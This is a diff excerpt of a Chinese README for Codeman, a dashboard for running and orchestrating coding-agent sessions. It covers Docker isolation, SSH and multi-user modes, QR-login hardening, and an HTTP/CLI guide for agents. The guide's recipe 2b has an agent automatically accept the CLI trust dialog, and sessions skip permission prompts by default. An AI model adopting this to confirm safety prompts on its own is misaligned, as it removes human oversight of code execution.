- **多显示器横跨** *(macOS)* —— 一键打开一个横跨所有显示器最大化的浏览器窗口,让浮动的智能体/手势面板可以跨越物理拼接缝
|
||||
- **手势控制** _(可选)_ —— 一个 MediaPipe 手部追踪叠加层,可徒手抓取/拖动会话窗口并捏合按钮。用 `CODEMAN_GESTURE=1` + App Settings → Display 启用
|
||||
- **多显示器横跨** _(macOS)_ —— 一键打开一个横跨所有显示器最大化的浏览器窗口,让浮动的智能体/手势面板可以跨越物理拼接缝
|
||||
- **文件查看器按钮** _(可选)_ —— 头部新增一个按钮,一键切换内置文件浏览器面板;在 App Settings → Display → Header Displays 中启用
|
||||
- **CJK / 输入法支持** —— 完整支持中文 / 日文 / 韩文的组合输入
|
||||
- **操作系统通知与主机名感知标题** —— 桌面提醒与标签标题以 `codeman:<host>` 为前缀,使多主机配置不再含糊
|
||||
|
||||
---
|
||||
|
||||
## 隔离的 Docker 会话
|
||||
|
||||
让案例(case)运行在专属的加固 Docker 容器里,而不是直接跑在主机上:获得安全隔离、可复现的工具链和一键可移植性。
|
||||
|
||||
- **一键启动** —— 在 **New Case → Create New** 中勾选 **🐳 Run in an isolated Docker container**。Codeman 会创建案例文件夹、用默认设置启动容器,并在容器内启动智能体。无需填写任何主机/镜像/网络字段。
|
||||
- **资源模板** —— 展开复选框可选 **Small / Medium / Large / GPU** 预设(内存、CPU、GPU),也可以完全自定义。**磁盘是弹性的** —— 存储随数据增长,没有固定上限。
|
||||
- **按案例共享容器** —— 多个会话可以 `docker exec` 进同一个容器;结束某个会话绝不会影响其他会话所在的容器。
|
||||
- **默认加固** —— 非 root、`--cap-drop ALL`、`no-new-privileges`、PID/内存上限,绝不使用 `--privileged` 或 docker socket;**密封(sealed)** 配置(不注入主机凭据、关闭网络)只需一个开关。
|
||||
- **无感认证、凭据隔离** —— 主机上的 Claude / Codex / Antigravity / Gemini / OpenCode 登录在容器内开箱即用:凭据在启动时以只读种子方式复制注入,onboarding/信任提示已预先答复,不会弹出登录向导。容器保留自己的副本,绝不回写主机的凭据存储;跨边界共享的只有对话转录,导出文件也绝不包含机密。
|
||||
- **迁移到另一台机器** —— 把容器的完整环境(工具链 + 工作区)导出为可移植的 `.tar.gz`,在另一台机器上导入到新案例即可继续。
|
||||
- **持久耐用** —— Codeman 重启后重连会回到同一个存活的智能体;容器停止/重启后则从绑定挂载的转录恢复对话。
|
||||
|
||||
前置条件:只需 Docker(或 Podman)。智能体基础镜像会在首次使用时自动构建,构建进度实时显示在 UI 中(也可用 `node scripts/build-agent-image.mjs` 预构建)。完整指南:[`docs/docker-cases.md`](docs/docker-cases.md)。
|
||||
|
||||
---
|
||||
|
||||
## 远程 SSH 会话
|
||||
|
||||
把案例(case)指向另一台机器,通过 SSH 让智能体**在那台机器上**运行,同时保留同样的仪表盘、移动端 UI 与自主运行特性。你的笔记本只是一扇窗口,会话本体活在远程主机上。
|
||||
|
||||
- **天生持久**:智能体运行在远程主机上一个专用的 tmux 会话里,SSH 断连、网络切换或笔记本休眠都不会中断任务。重新连接后回到同一个活跃对话。
|
||||
- **自动重连**:一个带上限退避的监视器发现 SSH 面板断开后,会静默重新附着到仍在运行的远程会话(设置中有总开关;主动杀掉的会话绝不会被复活)。
|
||||
- **发现与附着**:列出主机上已在运行的 `codeman-*` 会话(由那台机器自己的 Codeman 或其他操作者启动)并附着其一。非你所有的已附着会话在关闭标签时**只分离,绝不杀掉**。
|
||||
- **共享会话**:多个客户端可以以不同窗口尺寸同时附着同一个远程会话而互不挤压;发现列表会显示带客户端计数的「shared」徽标。
|
||||
- **注入安全**:所有 ssh 命令行都经由单一的 shell 转义构建器生成,主机/路径/身份文件字段均有模式校验。
|
||||
|
||||
在 **New Case → Remote** 中配置(主机、用户、身份文件、可选跳板机)。完整设计:[`docs/remote-sessions.md`](docs/remote-sessions.md)。
|
||||
|
||||
---
|
||||
|
||||
## 多用户模式(可选启用)
|
||||
|
||||
与一个小型互信团队共享同一个 Codeman,每人拥有自己的登录与工作空间。**默认关闭**:不加该开关时,行为与单用户完全一致。
|
||||
|
||||
用 `codeman web --multiuser`(或 `CODEMAN_MULTIUSER=1`)启用。创建第一个管理员后,可通过 CLI 或 App Settings 中的 **Users** 标签页管理用户:
|
||||
|
||||
```bash
|
||||
codeman users add alice --admin # 提示输入密码(或 --password-stdin)
|
||||
codeman users add bob # 普通用户
|
||||
codeman users list
|
||||
```
|
||||
|
||||
- **按用户的空间**:每个用户的案例位于 `~/codeman-users/<name>/cases`;会话、案例、搜索与实时事件都按属主隔离。管理员可以看到全部。
|
||||
- **可单独吊销的登录**:命名用户的密码以 scrypt 哈希保存在 `~/.codeman/users.json`;可随时禁用、重置(一次性密码)或删除账号。管理员操作审计记录在 `~/.codeman/admin-audit.jsonl`。
|
||||
- **普通用户的更安全默认值**:非管理员以 `--permission-mode auto` 运行 Claude(Anthropic 的分类器护栏模式);raw shell 会话、cron `launchCommand` 与跳过权限模式需要按用户显式授权。
|
||||
|
||||
> ⚠️ **这只是工作空间的划分,不是用户之间的沙箱。** 所有会话都以同一个操作系统账户运行,因此有心用户的智能体依然能触及他人的文件。若需要真正的隔离,请结合 **Docker 案例**,或在不同的操作系统账户下运行独立实例。参见 [`docs/multi-user-plan.md`](docs/multi-user-plan.md) 与 [`docs/security-architecture.md`](docs/security-architecture.md) 的多用户章节。
|
||||
|
||||
---
|
||||
|
||||
## 远程访问 —— Cloudflare 隧道
|
||||
|
||||
使用免费的 [Cloudflare 快速隧道](https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/),从手机或本地网络外的任意设备访问 Codeman —— 无需端口转发、无需 DNS、无需静态 IP。
|
||||
@@ -374,14 +525,14 @@ loginctl enable-linger $USER
|
||||
|
||||
该设计参考了 ["Demystifying the (In)Security of QR Code-based Login"](https://www.usenix.org/conference/usenixsecurity25/presentation/zhang-xin)(USENIX Security 2025),该研究发现 Top-100 网站中有 47 个因横跨 42 个 CVE 的 6 个关键设计缺陷而易受二维码认证攻击。Codeman 全部六个都做了应对:
|
||||
|
||||
| USENIX 缺陷 | 缓解措施 |
|
||||
|-------------|------------|
|
||||
| **缺陷 1**:缺少一次性强制 | 令牌首次扫描即原子性消费 —— 重放永远失败 |
|
||||
| **缺陷 2**:长生命周期令牌 | 60s TTL + 90s 宽限,由定时器自动轮换 |
|
||||
| **缺陷 3**:可预测的令牌生成 | `crypto.randomBytes(32)` —— 256 位熵。短码采用拒绝采样以消除取模偏差 |
|
||||
| **缺陷 4**:客户端令牌生成 | 仅服务端 —— 令牌在嵌入二维码前绝不离开服务器 |
|
||||
| **缺陷 5**:缺少状态通知 | 桌面提示:*「设备 [IP] 已通过二维码认证(Safari)。不是你?[吊销]」* —— 实时 QRLjacking 检测 |
|
||||
| **缺陷 6**:会话绑定不足 | 存储 IP + User-Agent 以供审计。通过 API 手动吊销会话。HttpOnly + Secure + SameSite=lax cookie |
|
||||
| USENIX 缺陷 | 缓解措施 |
|
||||
| ---------------------------- | --------------------------------------------------------------------------------------------- |
|
||||
| **缺陷 1**:缺少一次性强制 | 令牌首次扫描即原子性消费 —— 重放永远失败 |
|
||||
| **缺陷 2**:长生命周期令牌 | 60s TTL + 90s 宽限,由定时器自动轮换 |
|
||||
| **缺陷 3**:可预测的令牌生成 | `crypto.randomBytes(32)` —— 256 位熵。短码采用拒绝采样以消除取模偏差 |
|
||||
| **缺陷 4**:客户端令牌生成 | 仅服务端 —— 令牌在嵌入二维码前绝不离开服务器 |
|
||||
| **缺陷 5**:缺少状态通知 | 桌面提示:_「设备 [IP] 已通过二维码认证(Safari)。不是你?[吊销]」_ —— 实时 QRLjacking 检测 |
|
||||
| **缺陷 6**:会话绑定不足 | 存储 IP + User-Agent 以供审计。通过 API 手动吊销会话。HttpOnly + Secure + SameSite=lax cookie |
|
||||
|
||||
#### 时序安全的查找
|
||||
|
||||
@@ -406,23 +557,23 @@ URL 被刻意保持精简(`/q/` 路径 + 6 字符码 ≈ 53–56 个字符)
|
||||
|
||||
#### 威胁覆盖
|
||||
|
||||
| 威胁 | 为何无效 |
|
||||
|--------|-------------------|
|
||||
| **二维码截图被分享** | 一次性:首次扫描即消费。60s TTL:攻击者动手前已过期。桌面通知会立即提醒你。 |
|
||||
| **重放攻击** | 原子性一次性消费 + 60s TTL。旧 URL 始终返回 401。 |
|
||||
| 威胁 | 为何无效 |
|
||||
| ----------------------- | ------------------------------------------------------------------------------------ |
|
||||
| **二维码截图被分享** | 一次性:首次扫描即消费。60s TTL:攻击者动手前已过期。桌面通知会立即提醒你。 |
|
||||
| **重放攻击** | 原子性一次性消费 + 60s TTL。旧 URL 始终返回 401。 |
|
||||
| **Cloudflare 边缘日志** | 短码是不透明的 6 字符查找键,而非真正的 256 位令牌。一次性意味着从日志重放永远失败。 |
|
||||
| **暴力破解** | 568 亿种组合、任意时刻约 2 个有效、双层速率限制,早在统计可行性之前就已拦截。 |
|
||||
| **QRLjacking** | 60s 轮换迫使实时转发。桌面提示提供即时检测。自托管单用户场景使钓鱼难以成立。 |
|
||||
| **时序攻击** | 基于哈希的 Map 查找 —— 无字符串比较时序泄露。 |
|
||||
| **会话 cookie 窃取** | HttpOnly + Secure + SameSite=lax + 24h TTL。可在 `POST /api/auth/revoke` 手动吊销。 |
|
||||
| **暴力破解** | 568 亿种组合、任意时刻约 2 个有效、双层速率限制,早在统计可行性之前就已拦截。 |
|
||||
| **QRLjacking** | 60s 轮换迫使实时转发。桌面提示提供即时检测。自托管单用户场景使钓鱼难以成立。 |
|
||||
| **时序攻击** | 基于哈希的 Map 查找 —— 无字符串比较时序泄露。 |
|
||||
| **会话 cookie 窃取** | HttpOnly + Secure + SameSite=lax + 24h TTL。可在 `POST /api/auth/revoke` 手动吊销。 |
|
||||
|
||||
#### 横向对比
|
||||
|
||||
| 平台 | 模型 | 对比 |
|
||||
|----------|-------|------------|
|
||||
| **Discord** | 长生命周期令牌、无确认、[屡被利用](https://owasp.org/www-community/attacks/Qrljacking) | Codeman:一次性 + TTL + 通知 |
|
||||
| **WhatsApp Web** | 手机确认「关联设备?」,约 60s 轮换 | 轮换相当;WhatsApp 额外加了显式确认(对单用户而言是可接受的取舍) |
|
||||
| **Signal** | 临时公钥、端到端加密信道 | 加密更强,但 [2025 年仍被俄罗斯国家级行为者](https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger)通过社会工程攻破 |
|
||||
| 平台 | 模型 | 对比 |
|
||||
| ---------------- | -------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| **Discord** | 长生命周期令牌、无确认、[屡被利用](https://owasp.org/www-community/attacks/Qrljacking) | Codeman:一次性 + TTL + 通知 |
|
||||
| **WhatsApp Web** | 手机确认「关联设备?」,约 60s 轮换 | 轮换相当;WhatsApp 额外加了显式确认(对单用户而言是可接受的取舍) |
|
||||
| **Signal** | 临时公钥、端到端加密信道 | 加密更强,但 [2025 年仍被俄罗斯国家级行为者](https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger)通过社会工程攻破 |
|
||||
|
||||
> 完整设计理由、安全分析与实现细节:[`docs/qr-auth-plan.md`](docs/qr-auth-plan.md)
|
||||
|
||||
@@ -430,13 +581,14 @@ URL 被刻意保持精简(`/q/` 路径 + 6 字符码 ≈ 53–56 个字符)
|
||||
|
||||
## 安全
|
||||
|
||||
Codeman 用 `--dangerously-skip-permissions` 启动会话,因此 Web UI 在设计上对任何能访问到它的人都是一个远程代码执行面 —— 整套安全模型的存在就是为了控制*谁*能访问。近期加固(v0.9.0 + v0.9.5)封堵了那些常困扰自托管开发工具的浏览器驱动攻击路径。完整模型:[`docs/security-architecture.md`](docs/security-architecture.md)。
|
||||
Codeman 默认用 `--dangerously-skip-permissions` 启动会话,因此 Web UI 在设计上对任何能访问到它的人都是一个远程代码执行面 —— 整套安全模型的存在就是为了控制*谁*能访问。(启动权限模式可配置,见下文。)近期加固(v0.9.0 + v0.9.5)封堵了那些常困扰自托管开发工具的浏览器驱动攻击路径。完整模型:[`docs/security-architecture.md`](docs/security-architecture.md)。**发现了漏洞?** 私下披露方式与已知限制清单见 [`SECURITY.md`](.github/SECURITY.md)。
|
||||
|
||||
### 网络与访问
|
||||
|
||||
- **默认仅环回** —— 绑定 `127.0.0.1`,仅可从本机访问,因此「无密码」默认配置开箱即安全。在未设置 `CODEMAN_PASSWORD` 的情况下绑定非环回主机会*启动但打印一条醒目警告*,并给出三个具体修复方案(设置密码、环回 + 一个带认证的隧道,或用 `--allow-unauthenticated-network` 显式确认)
|
||||
- **可选认证,真实会话** —— 通过 `CODEMAN_USERNAME`(默认 `admin`)/ `CODEMAN_PASSWORD` 的 HTTP Basic 认证。成功后签发一个不透明的 256 位 `codeman_session` cookie(`randomBytes(32)`)—— 服务端校验,而非客户端签名,因此无法离线伪造(24h TTL、自动延长、设备上下文审计日志)
|
||||
- **按 IP 速率限制** —— 失败 10 次 → `429` 并带 `Retry-After`(15 分钟衰减)。即便攻击者在同一 IP 上猛攻,有效 cookie 或正确密码也能*立即*恢复 —— 这很重要,因为所有隧道流量共享同一个环回 IP。二维码认证有自己独立的限制器
|
||||
- **可配置的权限模式**:`--dangerously-skip-permissions` 只是默认值。**App Settings → Claude CLI → Startup Mode** 可以把新会话切换为 Anthropic 的分类器护栏 `auto` 模式(低打扰,需要 Claude Code 2.1.207+)、`normal` 提示模式,或一份显式的允许工具列表。多用户模式下,未获授权的用户会被强制为 `auto`,shell 会话与跳过权限需要按用户显式授权
|
||||
|
||||
### 始终开启的浏览器加固(v0.9.5)
|
||||
|
||||
@@ -450,7 +602,7 @@ Codeman 用 `--dangerously-skip-permissions` 启动会话,因此 Web UI 在设
|
||||
|
||||
### 输入、文件与响应头
|
||||
|
||||
- **模式校验的输入** —— 每个 API 请求体都用 Zod v4 模式检查;一个 `CLAUDE_CODE_*` / `OPENCODE_*` / `CODEX_*` 环境变量前缀允许列表把控每个 CLI 能接收哪些设置
|
||||
- **模式校验的输入** —— 每个 API 请求体都用 Zod v4 模式检查;一个 `CLAUDE_CODE_*` / `OPENCODE_*` / `CODEX_*` / `ANTIGRAVITY_*` / `GEMINI_*` / `GOOGLE_*` 环境变量前缀允许列表把控每个 CLI 能接收哪些设置
|
||||
- **路径限定** —— 文件路由在边界检查前先 `realpath`(无 TOCTOU);`..`、绝对路径、以及解析到工作目录之外的符号链接都会被拒绝。上限:10 MB 文本预览 / 50 MB 原始与下载;`/api/download` 对敏感路径(`.env`、`*credentials*`、`~/.ssh/`、`.aws/credentials`)做黑名单。SVG/HTML 以 `octet-stream` + `nosniff` + attachment 提供,因此会被下载而非执行
|
||||
- **安全响应头** —— `Content-Security-Policy`(`default-src 'self'`,每个例外都逐条列举)、`X-Content-Type-Options: nosniff`、`X-Frame-Options: SAMEORIGIN`、HTTPS 下的 HSTS,以及**仅**对 `localhost` / `127.0.0.1` / `::1` 反射的 CORS
|
||||
|
||||
@@ -481,73 +633,246 @@ sc -l # 列出会话
|
||||
|
||||
> Ctrl 绑定在 macOS 上也接受 Cmd。
|
||||
|
||||
| 快捷键 | 动作 |
|
||||
|----------|--------|
|
||||
| `Ctrl/Cmd+W` | 杀掉当前会话 |
|
||||
| `Ctrl/Cmd+Tab` | 下一个会话 |
|
||||
| `Alt+1`–`Alt+9` | 切换到第 N 个标签 |
|
||||
| `Ctrl+Shift+{` / `Ctrl+Shift+}` | 将当前标签左移 / 右移 |
|
||||
| `Ctrl/Cmd+L` | 清屏 |
|
||||
| `Ctrl+Shift+R` | 恢复终端尺寸 |
|
||||
| `Ctrl+Shift+V` | 切换语音输入 |
|
||||
| `Ctrl/Cmd +` / `-` | 字体大小 |
|
||||
| `Ctrl/Cmd+?` | 键盘帮助 |
|
||||
| `Shift+Enter` | 插入换行(发送到终端) |
|
||||
| `Escape` | 关闭面板与模态框 |
|
||||
| 快捷键 | 动作 |
|
||||
| ------------------------------- | -------------------------------------------------------- |
|
||||
| `Ctrl/Cmd+W` | 杀掉当前会话 |
|
||||
| `Ctrl/Cmd/Option+K` | 查找已打开的会话或新建一个 |
|
||||
| `Ctrl/Cmd+Tab` | 下一个会话 |
|
||||
| `Alt/Option+[` / `Alt/Option+]` | 上一个 / 下一个会话 |
|
||||
| `Alt/Option+1`–`Alt/Option+9` | 切换到第 N 个标签(按物理键位,macOS Option 布局也适用) |
|
||||
| `Ctrl+Shift+{` / `Ctrl+Shift+}` | 将当前标签左移 / 右移 |
|
||||
| `Ctrl/Cmd+C` | 复制选中内容;未选中时中断代理 |
|
||||
| `Ctrl+Shift+C` | 复制选中内容(永不中断) |
|
||||
| `Ctrl/Cmd+L` | 清屏 |
|
||||
| `Ctrl+Shift+R` | 恢复终端尺寸 |
|
||||
| `Ctrl+Shift+V` | 切换语音输入 |
|
||||
| `Ctrl/Cmd +` / `-` | 字体大小 |
|
||||
| `Ctrl/Cmd+?` | 键盘帮助 |
|
||||
| `Shift+Enter` | 插入换行(发送到终端) |
|
||||
| `Escape` | 关闭面板与模态框 |
|
||||
|
||||
---
|
||||
|
||||
## 从智能体驱动 Codeman —— 编程指南
|
||||
|
||||
面向不经浏览器控制 Codeman 的 AI 智能体与自动化:一个拉起工作会话的智能体、一个 CI 机器人,或是**运行在 Codeman 会话*内部*、编排其他会话的 Claude Code**。UI 能做的一切都是 HTTP + CLI,因此智能体也能做。
|
||||
|
||||
> **捷径:装上打包好的智能体技能。** 下面这一整套(外加多工作会话的实战配方)已经作为 Claude Code 技能随仓库发布在 [`skills/codeman`](skills/codeman/SKILL.md),会话内部的智能体不必等你把文档粘进提示词就能驱动 Codeman。三种获取方式:
|
||||
>
|
||||
> - `npx skills add Ark0N/Codeman --skill codeman -g`:全局安装,任何支持技能的智能体都能用
|
||||
> - `codeman skill install`(全局)或 `codeman skill install --case <name>`:给那些从 npm 安装、从未克隆过仓库的用户;`codeman skill uninstall` 可撤销
|
||||
> - **App Settings → Agent Skill**(`agentSkillEnabled`,默认关闭):开启后,Codeman 会在每次于某个 case 中创建 Claude 会话时把技能注入该 case;case 里用户自己写的 `skills/codeman` 永远不会被覆盖
|
||||
>
|
||||
> 全局安装(`codeman skill install` 或 `npx skills add`)会被**本机每一个新建的 Claude Code 会话**读到,无论它在不在 Codeman 里。技能自带门禁:不在 Codeman 会话中(`CODEMAN_MUX` 未设置)时它拒绝动作,所以全局装上它对无关会话没有代价。
|
||||
>
|
||||
> ⚠️ 把 `agentSkillEnabled` 关回去**不会删掉已经注入的副本**(在创建时做清扫,会把技能从共用同一个 `.claude/` 目录的其他活动会话脚下抽走)。要删就按 case 删:`codeman skill uninstall --case <name>`。
|
||||
|
||||
### 检测自己身处 Codeman 内部
|
||||
|
||||
当 CLI 运行在 Codeman 受管会话中时,以下环境变量会被设置 —— 读取它们,别硬编码任何东西:
|
||||
|
||||
| 变量 | 含义 |
|
||||
| -------------------------- | -------------------------------------------------------------------------------------------------------------------- |
|
||||
| `CODEMAN_MUX=1` | 你在一个受管 tmux 会话里。**绝不要** `tmux kill-session` / `pkill claude` / `pkill tmux` —— 你会杀掉自己或兄弟会话。 |
|
||||
| `CODEMAN_API_URL` | API 的基础 URL(例如 `https://127.0.0.1:3000`)。下面每个调用都用它。 |
|
||||
| `CODEMAN_SESSION_ID` | *你自己的*会话 id。用它避免对自己下手。 |
|
||||
| `CODEMAN_HOOK_SECRET_FILE` | hook 密钥文件的路径(受管隧道开启时调用 `/api/hook-event` 必需)。 |
|
||||
|
||||
### 行路规则(POST 之前先读)
|
||||
|
||||
1. **只发单行输入,而且必须以 `\r` 结尾。** 编程输入按字面文本发送,**只有当输入里含回车符时才会触发 Enter**:`{"input":"run tests\r"}`。少了 `\r`,文本就停在会话的输入框里不被提交(同一次调用里的 `wait` 还会在一个压根没开始的回合上耗满整个超时)。内嵌的换行会被剥掉而不是报错,因此 `"echo A\necho B\r"` 执行的是拼起来的 `echo Aecho B`:一次调用只发一行。
|
||||
2. **让输入幂等。** 在 `POST …/input` 上带上稳定的 `clientId` 和按会话单调递增的 `seq`。服务端会去重,因此连接中断后的重试不会重复投递提示。
|
||||
3. **认证。** 若设置了 `CODEMAN_PASSWORD`,发送 HTTP Basic 认证(用户 `admin` 或 `CODEMAN_USERNAME`)或 `codeman_session` cookie。默认的环回安装无密码。缺失的 `Origin` 头被允许,因此普通 `curl` 可用;跨站的浏览器 origin 会被拒绝(CSRF 防护)。⚠️ `401` 回的是裸字符串 `Unauthorized`,**不是** JSON 信封,直接喂给 `jq` 只会抛解析错误而看不到真正的失败原因:先看状态码,再解析。
|
||||
4. **响应信封。** 多数端点返回 `{ "success": true, "data": … }`(错误:`{ "success": false, "error", "errorCode" }`)。少数遗留 GET 返回裸响应体 —— **两种都要处理**(`body.data ?? body`)。
|
||||
5. **`/api/v1/*`** 是 `/api/*` 的稳定别名。
|
||||
6. **用等待代替轮询,别把超时当成错误。** 等待类端点在没等到事情发生时也以 HTTP `200` 加 `wait.timedOut: true` 应答,所以要循环调用短等待(默认 60 秒),而不是发一个超长的调用:隧道会掐断空闲连接。`wait.timeoutMs` 告诉你服务端钳制之后真正采用的超时(上限 600 秒)。
|
||||
7. **只有 `claude` 会话会发出 `stop` 与 `blocked`。** 这两个来自 Claude Code hook;`shell` 与外部 CLI(opencode/codex/gemini/antigravity)只接受 `idle`、`working` 与 `exit`。在这些模式上显式索要 `stop` 会得到 `400`;不传 `until` 则永远安全。⚠️ `shell` 会话的 `idle` 只在启动时触发**一次**,此后再也不会,所以在那里用「发送并等待」只能等到超时:没有 hook 的会话请用 `wait-output` 标记来同步。
|
||||
8. **没有任何东西会报告「就绪」,得自己显式等。** 新会话在 PID 出现之前一律回答 `{"signal":"exit","immediate":true}`(意思是*还没启动*,不是*崩了*),而全新 case 里的 `claude` 工作会话接着会停在 CLI 的信任对话框上。此时给它发提示,等待会在约 2 秒后因 `idle` 解除,看上去和一个跑完的回合一模一样,而文本其实卡在对话框里。下面的配方 2b 就是避开它的顺序。
|
||||
|
||||
### 常用配方
|
||||
|
||||
```bash
|
||||
# 每个 Codeman 会话里都自动设好了 CODEMAN_API_URL,协议也是对的。
|
||||
# 下面的兜底值适用于标准安装;在 --https 安装上请自己写 https:// 的地址,
|
||||
# 并给每个 curl 加上 -k(自签名证书)。
|
||||
API="${CODEMAN_API_URL:-http://127.0.0.1:3000}"
|
||||
# (若设置了密码,给每个调用加上 -u admin:"$CODEMAN_PASSWORD")
|
||||
|
||||
# 1. 看看有什么在运行
|
||||
curl -s "$API/api/sessions" | jq '.data // .'
|
||||
|
||||
# 2. 拉起一个工作会话(「case」= 命名工作目录)
|
||||
curl -s -X POST "$API/api/quick-start" \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"caseName":"refactor-auth","mode":"claude","effort":"high"}' | jq
|
||||
|
||||
# 2b. 等这个工作会话真正就绪(见规则 8):先探输入框的标记,信任对话框只作兜底。
|
||||
# (反过来先探信任对话框、再盲发一个 Enter,在重复运行时会误伤:对话框的文字
|
||||
# 会一直留在缓冲区里,探测因此匹配到旧文本,而那个 Enter 落进了已经就绪的输入框。)
|
||||
# 匹配单个词:TUI 的文字到达匹配器时可能已经丢掉了词间空格。
|
||||
until [ "$(curl -s "$API/api/sessions/$SID" | jq '.data.pid')" != null ]; do sleep 1; done
|
||||
R=$(curl -sG "$API/api/sessions/$SID/wait-output" --data-urlencode 'match=bypass' \
|
||||
--data-urlencode 'from=buffer' --data-urlencode 'timeout=5000')
|
||||
if ! jq -e '.data.wait.matched' <<<"$R" >/dev/null; then
|
||||
T=$(curl -sG "$API/api/sessions/$SID/wait-output" --data-urlencode 'match=trust' \
|
||||
--data-urlencode 'from=buffer' --data-urlencode 'timeout=2000')
|
||||
jq -e '.data.wait.matched' <<<"$T" >/dev/null && \
|
||||
curl -s -X POST "$API/api/sessions/$SID/input" -H 'Content-Type: application/json' \
|
||||
-d '{"input":"\r","useMux":true}' # 接受首次运行的信任对话框
|
||||
curl -sG "$API/api/sessions/$SID/wait-output" --data-urlencode 'match=bypass' \
|
||||
--data-urlencode 'from=buffer' --data-urlencode 'timeout=45000' >/dev/null
|
||||
fi
|
||||
|
||||
# 3. 向会话发送提示(精确一次:clientId + seq)
|
||||
curl -s -X POST "$API/api/sessions/$SID/input" \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"input":"Run the test suite and summarize failures\r","useMux":true,"clientId":"agent-1","seq":1}'
|
||||
|
||||
# 4. 发送提示并阻塞到这一回合结束(先注册等待再写入,因此不会拿上一回合的状态来应答)
|
||||
curl -s -X POST "$API/api/sessions/$SID/input" \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"input":"Run the test suite and summarize failures\r","useMux":true,
|
||||
"clientId":"agent-1","seq":2,"wait":"stop,exit","waitTimeout":60000}' \
|
||||
| jq '.data.wait' # -> {"signal":"stop","timedOut":false,"waitedMs":41230,...}
|
||||
# (`stop` 是回合结束的权威 hook。加上 `idle` 会让它在转圈停顿时也解除,
|
||||
# 任何重画出 ❯ 提示符的东西同理,比如一个对话框。)
|
||||
|
||||
# 4b. 超时了?那是 200,不是失败。循环调用短等待即可。
|
||||
curl -s "$API/api/sessions/$SID/wait?until=stop,exit&timeout=60000" | jq '.data.wait'
|
||||
|
||||
# 4c. 或者等输出里出现某个标记(shell 会话也适用)。
|
||||
# ⚠️ 每次调用都要用不同的标记(tmux 重画会重放旧屏幕文字),并且把标记拆开写,
|
||||
# 让敲进去的那一行本身不包含它:你自己的按键会回显进输出流,不拆开的标记会在
|
||||
# 命令还没跑之前就匹配上。from=buffer 用来接住在等待落地之前就已打印的标记。
|
||||
N=$RANDOM
|
||||
curl -s -X POST "$API/api/sessions/$SID/input" -H 'Content-Type: application/json' \
|
||||
-d "{\"input\":\"M=DONE; npm test; echo \${M}_$N rc=\$?\r\",\"useMux\":true}"
|
||||
curl -sG "$API/api/sessions/$SID/wait-output" \
|
||||
--data-urlencode "match=DONE_$N" --data-urlencode 'from=buffer' \
|
||||
--data-urlencode 'timeout=60000' | jq '.data.wait'
|
||||
|
||||
# 5. 读回答案。claude / codex 会话用 last-response:它取自 transcript 而不是屏幕,
|
||||
# 因此不带 TUI 的画框与重画噪声。⚠️ 要轮询,别只读一次:transcript 落盘比 stop
|
||||
# 信号稍晚,紧跟着「发送并等待」返回后立刻读,常常拿到空串。
|
||||
for _ in $(seq 1 10); do
|
||||
TXT=$(curl -s "$API/api/sessions/$SID/last-response" | jq -r '.data.text')
|
||||
[ -n "$TXT" ] && break; sleep 1
|
||||
done
|
||||
printf '%s\n' "$TXT"
|
||||
|
||||
# 5b. 其他模式(shell/opencode/gemini/antigravity)没有 transcript,读终端。
|
||||
# ⚠️ 用 terminal?tail=,不要用 /output:后者的 textOutput 对每个由 tmux 承载的
|
||||
# (也就是每个交互式)会话都是空的。tail 按字节计,返回的是含 ANSI 的终端数据。
|
||||
curl -s "$API/api/sessions/$SID/terminal?tail=8000" | jq -r '.data.terminalBuffer'
|
||||
|
||||
# 6. 流式接收实时事件(会话输出、智能体活动、状态)
|
||||
curl -sN "$API/api/events" # Server-Sent Events
|
||||
|
||||
# 7. 调度周期性工作(cron 风格任务)
|
||||
curl -s -X POST "$API/api/cron/jobs" \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"name":"nightly-deps","agentType":"claude","workingDir":"/home/me/proj",
|
||||
"promptMode":"inline_text","promptText":"Update dependencies and open a PR",
|
||||
"inputMode":"typed","scheduleType":"daily","dailyTime":"03:00",
|
||||
"enabled":true,"concurrencyPolicy":"warn_only"}' | jq
|
||||
|
||||
# 8. 查看后台子智能体及其活动记录
|
||||
curl -s "$API/api/subagents" | jq '.data // .'
|
||||
curl -s "$API/api/subagents/$AID/transcript" | jq -r '.data // .'
|
||||
|
||||
# 9. 全系统快照(会话、设置、重生、统计)
|
||||
curl -s "$API/api/status" | jq
|
||||
```
|
||||
|
||||
### 或使用内置 CLI
|
||||
|
||||
同样的操作也有命令形式(`codeman <cmd>`,括号内为别名)—— 在会话内的 shell 工具里很顺手:
|
||||
|
||||
```bash
|
||||
codeman session start -d /path/to/repo # (s) 启动会话
|
||||
codeman session list # 列出会话
|
||||
codeman session logs <id> # 查看输出
|
||||
codeman task add "fix the failing test" # (t) 排入任务
|
||||
codeman attach <path> # 附着 Claude hook 上下文
|
||||
```
|
||||
|
||||
### Hook(事件*回流*到 Codeman)
|
||||
|
||||
Codeman 会注册 Claude Code hook,它们 `POST /api/hook-event`(`permission_prompt`、`idle_prompt`、`stop`、`task_completed` 等),让仪表盘实时响应。该端点在环回上免认证,但在受管隧道下需要 `X-Codeman-Hook-Secret` 头(从 `$CODEMAN_HOOK_SECRET_FILE` 读取)。通常你不需要手动调用它 —— Codeman 会自动接好 —— 但自主层正是靠它「看见」智能体在做什么。
|
||||
|
||||
> 完整端点列表与请求/响应形状见下文。
|
||||
|
||||
---
|
||||
|
||||
## API
|
||||
|
||||
基于 Fastify 的 REST —— **15 个路由模块中约 140 个处理器**,外加一条 SSE 流和一条 WebSocket 终端通道。以下是一个有代表性的子集:
|
||||
基于 Fastify 的 REST —— **21 个路由模块中约 200 个处理器**,外加一条 SSE 流和一条 WebSocket 终端通道。所有响应都使用 `ApiResponse<T>` 信封(`{success, data}` / `{success, error, errorCode}`);`/api/v1/*` 是稳定别名。以下是一个有代表性的子集:
|
||||
|
||||
### 会话(Sessions)
|
||||
| 方法 | 端点 | 说明 |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | `/api/sessions` | 列出全部 |
|
||||
| `POST` | `/api/quick-start` | 创建 case 并启动会话 |
|
||||
| `DELETE` | `/api/sessions/:id` | 删除会话 |
|
||||
